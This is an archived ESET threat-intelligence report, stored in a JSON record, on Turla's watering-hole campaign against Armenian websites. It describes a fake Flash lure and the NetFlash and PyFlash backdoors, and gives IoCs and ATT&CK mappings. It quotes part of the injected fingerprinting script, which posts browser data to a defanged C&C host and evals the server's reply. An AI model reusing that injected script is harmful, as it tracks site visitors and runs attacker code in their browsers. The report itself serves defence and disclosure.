{ "id": "3d850a22-9d70-46ac-9f03-5eaafb83ffb6", "created_at": "2026-04-06T00:11:24.653879Z", "updated_at": "2026-04-10T03:33:35.88599Z", "deleted_at": null, "sha1_hash": "e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6", "title": "Tracking Turla: New backdoor delivered via Armenian watering holes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 500945, "plain_text": "Tracking Turla: New backdoor delivered via Armenian watering\r\nholes\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 23:12:34 UTC\r\nESET researchers found a watering hole (aka strategic web compromise) operation targeting several high-profile\r\nArmenian websites. It relies on a fake Adobe Flash update lure and delivers two previously undocumented pieces\r\nof malware we have dubbed NetFlash and PyFlash.\r\nVarious aspects of this campaign lead us to attribute this operation to Turla, an infamous espionage group active\r\nfor more than ten years. Its main targets include governmental and military organizations. We have previously\r\nreported multiple campaigns of this group including Mosquito and LightNeuron.\r\nThis recent operation bears similarities to several of Turla’s watering hole campaigns that we have tracked in the\r\npast years. In particular, the modus operandi is similar to a campaign we uncovered in 2017. The various pieces of\r\nJavaScript used there are almost identical to those in this campaign, but the targets and payloads are different.\r\nTargeted websites\r\nIn this specific operation, Turla has compromised at least four Armenian websites, including two belonging to the\r\ngovernment. Thus, it is likely the targets include government officials and politicians.\r\nAccording to ESET telemetry, the following websites were compromised:\r\narmconsul[.]ru: The consular Section of the Embassy of Armenia in Russia\r\nmnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh\r\naiisa[.]am: The Armenian Institute of International and Security Affairs\r\nadgf[.]am: The Armenian Deposit Guarantee Fund\r\nWe have indications that these websites were compromised since at least the beginning of 2019. We notified the\r\nArmenian national CERT and shared our analysis with them before publication.\r\nTurla operators leveraged unknown access methods to these websites to insert a piece of malicious JavaScript\r\ncode. For example, for mnp.nkr[.]am, they appended obfuscated code at the end of jquery-migrate.min.js (a\r\ncommon JavaScript library), as shown in Figure 1.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 1 of 10\n\nFigure 1. Obfuscated JavaScript code injected into the mnp.nkr[.]am website\r\n \r\nThis code loads an external JavaScript from skategirlchina[.]com/wp-includes/data_from_db_top.php. We analyze\r\nthis code in the next section.\r\nSince the end of November 2019, we noticed that skategirlchina[.]com was not delivering malicious scripts\r\nanymore. Thus, it is likely the Turla operators have suspended this watering hole operation.\r\nFingerprinting and malware delivery\r\nUpon visiting a compromised webpage, the second-stage malicious JavaScript is delivered by\r\nskategirlchina[.]com and fingerprints the visitor’s browser. Figure 2 shows the main function of this script.\r\nIf it is the first time the user’s browser executes the script, it will add an evercookie with a seemingly random\r\nMD5 value provided by the server, different at each execution of the script. The implementation of the evercookie\r\nis based on code available on GitHub. It uses multiple storage places such as the local database, local shared\r\nobjects (Flash cookies), Silverlight storage, etc., to store the cookie value. In comparison to a regular cookie, it\r\nwill be much more persistent as it won’t be deleted if the user just deletes the browser’s cookies.\r\nThis evercookie will be used to track whether the user visits one of the compromised websites again. When the\r\nuser comes back for a second time, the previously stored MD5 value will be used to identify them.\r\nThen, it collects several pieces of information including the browser plugin list, the screen resolution and various\r\noperating system information. This is sent to the C\u0026C server in a POST request. If there is a reply, it is assumed to\r\nbe JavaScript code and is executed using the eval function.\r\n[…]\r\nfunction f_ec(){\r\n var ec = new evercookie({domain:'http://skategirlchina[.]com/wp-includes/data_from_db_top.php',baseurl:'?htt\r\n ec.get(\"ec\", function(value) {\r\n if (value!=undefined){\r\n var jsonText = {'ec': ''+value+'',\r\n 'scp':screen.pixelDepth==undefined?''+0+'':''+screen.pixelDepth+'',\r\n 'scw':''+screen.width+'',\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 2 of 10\n\n'sch':''+screen.height+'',\r\n 'bn':''+bn+'',\r\n 'bv':''+bv+'',\r\n 'bc':''+bc+'',\r\n 'osn':''+osn+'',\r\n 'osv':''+osv+'',\r\n 'osc':''+osc+'',\r\n 'adr':''+adr+'',\r\n 'pdr':''+pdr+'',\r\n 'fla':''+fla+'',\r\n 'jav':''+jav+'',\r\n 'wmp':''+wmp+'',\r\n 'msw':''+msw+'',\r\n 'qui':''+qui+'',\r\n 'sho':''+sho+'',\r\n 'type':'info',\r\n 'tiz': ''+(new Date().getTimezoneOffset()/60)+''\r\n };\r\n var json = JSON.stringify(jsonText);\r\n ajax({\r\n content_type : 'application/json',\r\n url: 'http://skategirlchina[.]com/wp-includes/data_from_db_top.php?http://skategirlchina[.]com/\r\n crossDomain: true,\r\n type: 'POST',\r\n data: json,\r\n onSuccess: function(m){\r\n eval(m);\r\n }\r\n });\r\n }\r\n else{\r\n ec.set('ec', '\u003credacted MD5 value\u003e');\r\n setTimeout(f_ec,1500);\r\n }\r\nFigure 2. Fingerprint script (malicious URLs defanged)\r\nIf the visitor is deemed interesting, the server replies with a piece of JavaScript code that creates an iframe. Data\r\nfrom ESET telemetry suggests that, for this campaign, only a very limited number of visitors were considered\r\ninteresting by Turla’s operators.\r\nThis iframe displays a fake Adobe Flash update warning to the user, shown in Figure 3, in order to trick them into\r\ndownloading a malicious Flash installer.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 3 of 10\n\nFigure 3. Fake Adobe Flash update iframe\r\nWe did not observe the use of any browser vulnerabilities. The compromise attempt relies only on this social\r\nengineering trick. Once the malicious executable is downloaded from the same server as the iframe’s JavaScript,\r\nand if the user launches it manually, a Turla malware variant and a legitimate Adobe Flash program are installed.\r\nFigure 4 is an overview of the compromise process from initially visiting one of the compromised Armenian\r\nwebsites to the delivery of a malicious payload.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 4 of 10\n\nFigure 4. Overview of the watering hole operation\r\nMalware\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 5 of 10\n\nOnce the user executes the fake installer, it will execute both a Turla malware variant and a legitimate Adobe\r\nFlash installer. Thus, the user is likely to believe that the update warning was legitimate.\r\nBefore September 2019: Skipper\r\nPrior to the end of August 2019, the victim would receive a RAR-SFX archive containing a legitimate Adobe\r\nFlash v14 installer and a second RAR-SFX archive. The latter contains the various components of a backdoor\r\nknown as Skipper that has been previously attributed to Turla. It was documented in 2017 by researchers from\r\nBitdefender, and a more recent version was documented by Telsy in May 2019.\r\nGiven that there are only minor changes between the documented versions and the most recent ones, we won’t\r\nprovide a detailed analysis here.\r\nOne interesting change is that the Skipper communication module uses the server that hosts this campaign’s\r\nremote JavaScripts and malicious binaries for its C\u0026C server, specifically skategirlchina[.]com/wp-includes/ms-locale.php.\r\nFrom September 2019: NetFlash and PyFlash\r\nAt the end of August 2019, we noticed that the payload delivered by skategirlchina[.]com changed.\r\nNetFlash (.NET downloader)\r\nThe new payload was a .NET application that dropped an installer for Adobe Flash v32 in %TEMP%\\adobe.exe,\r\nand NetFlash (a .NET downloader) in %TEMP%\\winhost.exe.\r\nAccording to their compilation timestamps, the malware samples were compiled at the end of August 2019 and at\r\nthe beginning on September 2019, right before being uploaded to the watering hole’s C\u0026C server.\r\nNetFlash downloads its second stage malware from a hardcoded URL and establishes persistence for this new\r\nbackdoor using a Windows scheduled task. Figure 5 shows the NetFlash function that downloads the second stage\r\nmalware, named PyFlash. We also encountered another NetFlash sample, likely compiled at the end of August\r\n2019, with a different hardcoded C\u0026C server: 134.209.222[.]206:15363.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 6 of 10\n\nFigure 5. Main function of NetFlash\r\nPyFlash\r\nThis second stage backdoor is a py2exe executable. py2exe is a Python extension to convert a Python script into a\r\nstandalone Windows executable. To our knowledge, this is the first time the Turla developers have used the\r\nPython language in a backdoor.\r\nThe backdoor communicates with its hardcoded C\u0026C server via HTTP. The C\u0026C URL and other parameters such\r\nas the AES key and IV used to encrypt all network communications are specified at the beginning of the script, as\r\nshown in Figure 6.\r\nFigure 6. Global variables in the PyFlash Python script\r\nThe main function of the script, shown in Figure 7, sends information about the machine to the C\u0026C server. This\r\nis the output of the functions from the commands list seen in Figure 6. It includes OS-related commands\r\n(systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp).\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 7 of 10\n\nFigure 7. Main function of PyFlash\r\nThe C\u0026C server can also send backdoor commands in JSON format. The commands implemented in this version\r\nof PyFlash are:\r\nDownload additional files from a given HTTP(S) link.\r\nExecute a Windows command using the Python function subprocess32.Popen.\r\nChange the execution delay: modifies the Windows task that regularly (every X minutes; 5 by default)\r\nlaunches the malware.\r\nKill (uninstall) the malware. To confirm this instruction the malware sends a POST request to the C\u0026C\r\nserver with the following string:\r\nI'm dying :(\r\nTell my wife that i love her...\r\nThen, the output of the command is sent back to the operators, encrypted with AES, via a POST request.\r\nConclusion\r\nTurla is still using watering hole attacks as one of its initial access tactics. Interestingly, this campaign relies on a\r\nwell-known social engineering trick – a fake Adobe Flash update warning – in order to induce the user to\r\ndownload and install malware.\r\nOn the other hand, the payload has changed, probably in order to evade detection, as Skipper has been known for\r\nmany years. They switched to NetFlash, which installs a backdoor we call PyFlash and that is developed in the\r\nPython language.\r\nWe will continue monitoring new Turla activities and will publish relevant information on our blog. For any\r\ninquiries, contact us as threatintel@eset.com. Indicators of Compromise can also be found on our GitHub\r\nrepository.\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 8 of 10\n\nIndicators of Compromise (IoCs)\r\nCompromised websites\r\nhttp://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js\r\nhttp://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js\r\nhttp://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js\r\nadgf[.]am\r\nC\u0026C servers\r\nhttp://skategirlchina[.]com/wp-includes/data_from_db_top.php\r\nhttp://skategirlchina[.]com/wp-includes/ms-locale.php\r\nhttp://37.59.60[.]199/2018/.config/adobe\r\nhttp://134.209.222[.]206:15363\r\nhttp://85.222.235[.]156:8000\r\nSamples\r\nSHA-1 Timestamp Description\r\nESET\r\nDetection Name\r\n973620A7AB28A2CBA82DC2A613CD24ED43734381\r\nThu Aug 29\r\n04:14:46\r\nUTC 2019\r\nNetFlash\r\nDropper\r\nMSIL/Turla.D\r\nB6567F988C9ACC5DF3CBD72409FC70D54EA412BB\r\nTue Sep 3\r\n11:12:04\r\nUTC 2019\r\nNetFlash MSIL/Turla.D\r\n9F81710B85AA7088505C1EECCE9DA94A39A2DC06\r\nThu Aug 29\r\n04:12:33\r\nUTC 2019\r\nNetFlash MSIL/Turla.F\r\n32430B11E42EDEB63A11E721927FFBABE7C9CFEA N/A PyFlash Win32/Turla.EM\r\n620A669EC0451C9F079FB4731F254AC577902E5E\r\nWed Aug\r\n29 09:43:18\r\nUTC 2018\r\nSkipper\r\ncommunication\r\nDLL\r\nWin32/Turla.EJ\r\nMITRE ATT\u0026CK techniques\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 9 of 10\n\nTactic ID Name Description\r\nInitial Access T1189 Drive-by Compromise\r\nTurla compromised high-value websites to\r\ndeliver malware to the visitors.\r\nExecution T1204 User Execution\r\nA fake Flash installer is intended to trick the\r\nuser into launching the malware.\r\nPersistence T1053 Scheduled Task\r\nNetFlash and PyFlash persist using scheduled\r\ntasks.\r\nDiscovery\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nPyFlash executes ipconfig /all, getmac and arp -\r\na\r\nT1057 Process Discovery PyFlash executes tasklist\r\nT1082\r\nSystem Information\r\nDiscovery\r\nPyFlash executes systeminfo\r\nCommand and\r\nControl\r\nT1032\r\nStandard Cryptographic\r\nProtocol\r\nPyFlash uses AES-128 in CBC mode to encrypt\r\nC\u0026C communications.\r\nT1043 Commonly Used Port NetFlash uses port 80.\r\nT1065 Uncommonly Used Port\r\nPyFlash uses port 8,000.\r\nA NetFlash sample uses port 15,363.\r\nT1071\r\nStandard Application Layer\r\nProtocol\r\nNetFlash and PyFlash use HTTP.\r\nExfiltration T1041\r\nExfiltration Over Command\r\nand Control Channel\r\nThe output of PyFlash surveillance and C\u0026C\r\ncommands are exfiltrated using the C\u0026C\r\nprotocol.\r\nSource: https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nhttps://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], "report_names": [ "tracking-turla-new-backdoor-armenian-watering-holes" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434284, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.pdf", "text": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.txt", "img": "https://archive.orkl.eu/e93581b79d670bf7ec5fdcbdf5e1ed00f7981bc6.jpg" } }